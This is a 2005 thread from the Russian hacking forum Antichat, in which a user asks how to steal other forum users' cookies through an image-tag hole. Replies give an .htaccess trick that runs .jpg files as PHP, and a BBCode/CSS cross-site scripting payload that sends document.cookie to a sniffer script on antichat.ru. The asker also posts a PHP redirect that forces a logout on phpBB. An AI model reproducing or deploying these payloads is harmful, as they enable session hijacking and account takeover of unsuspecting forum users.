Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
04.09.2005, 17:17
|
|
Познающий
Регистрация: 19.08.2005
Сообщений: 44
Провел на форуме:
103401
Репутация:
2
|
|
Вопрос по php
Собственно не подскажет ли кто-нить php-код (в пхп я 0) при исполнении которого высылались бы на тот же сниффер античата кукизы?
Это я все к уязвимости через [img], когда можно заставить юзверя айти на страничку и выполнить код. Что-нибудь безобидное - типа разлогинивания - легко.. А вот как сделать что-нибудь серьезное я не знаю...
И вообще возможно ли это? ) Хотя я думаю, что возможно..
|
|
|
04.09.2005, 17:24
|
|
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
Провел на форуме:
2386719
Репутация:
1384
|
|
хм... либо я тебя не понял, либо ты неправильно выразился. Какие кукизы тебе php должен выслать? или тебе код самого сниффире нужен?
__________________
http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)
http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
|
|
|
|
04.09.2005, 17:46
|
|
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
Провел на форуме:
3606217
Репутация:
685
|
|
Никакая не уязвимость, например есть картинка которую смотрит юзер, в директории в которой есть данная картинка, там же лежит файл .htaccess с содержанием
Код:
AddType application/x-httpd-php .jpg
смотря какое расширение у картинке,т.е. jpg файл обрабатывается как php. В самом файле например sniffer.jpg идёт пхп код, который содержит переменные окружения, а он в свою очередь отсылает их в log. |
|
|
|
04.09.2005, 17:49
|
|
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
Провел на форуме:
3606217
Репутация:
685
|
|
подожди... или ты хочешь, чтобы ты вставил [*img]http://xxx.xx/sniffer.jpg[/img] и те кукисы отослались?
|
|
|
|
04.09.2005, 18:41
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
[COLOR=[*IMG]http://aaa.aa/=`aaa.jpg[/*IMG]]` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) [/COLOR]
типа что то этого ты имел ввиду?
без зведочек естественно
|
|
|
|
04.09.2005, 21:46
|
|
Познающий
Регистрация: 19.08.2005
Сообщений: 44
Провел на форуме:
103401
Репутация:
2
|
|
Нет у я немного про другую уязвимость. Создаешь директорию /*.jpg . И тэгуешь ее в [img] . В директории создаешь файл index.php - и он исполняется...
<?php
header("Location: http://hosttobeexploited/phpBB/login.php?logout=true");
exit;
?>
Вот это как написано везде получается выполнять - разлогинивание. А вот как выполнить что-нить серьезное я хз. |
|
|
|
04.09.2005, 23:11
|
|
Познающий
Регистрация: 19.08.2005
Сообщений: 44
Провел на форуме:
103401
Репутация:
2
|
|
подожди... или ты хочешь, чтобы ты вставил [*img]http://xxx.xx/sniffer.jpg[/img] и те кукисы отослались?
Да. так тоже можно )
|
|
|
|
04.09.2005, 23:17
|
|
Познающий
Регистрация: 19.08.2005
Сообщений: 44
Провел на форуме:
103401
Репутация:
2
|
|
Собственно неважно каким способом, я бы хотел добиться эффекта как в XSSе предыдущем с тэгом [url]. Загружается .jpg на страничке и при загрузке шлются кукизы юзера с этого форума.
Я думаю для тех, кто знает php на уровне пользователя не тяжело подсказать-с
|
|
|
|
05.09.2005, 19:26
|
|
Познающий
Регистрация: 19.08.2005
Сообщений: 44
Провел на форуме:
103401
Репутация:
2
|
|
Итак, кто-нить может помочь? если че моя ася 174621979
|
|
|
|
08.09.2005, 21:49
|
|
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487
Репутация:
11
|
|
Ты че систему аутентификации чтоли делаешь?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для NaX[no]rT](/avatars/avatar18908.gif){kind=avatar}
Похожие темы
Линейный вид
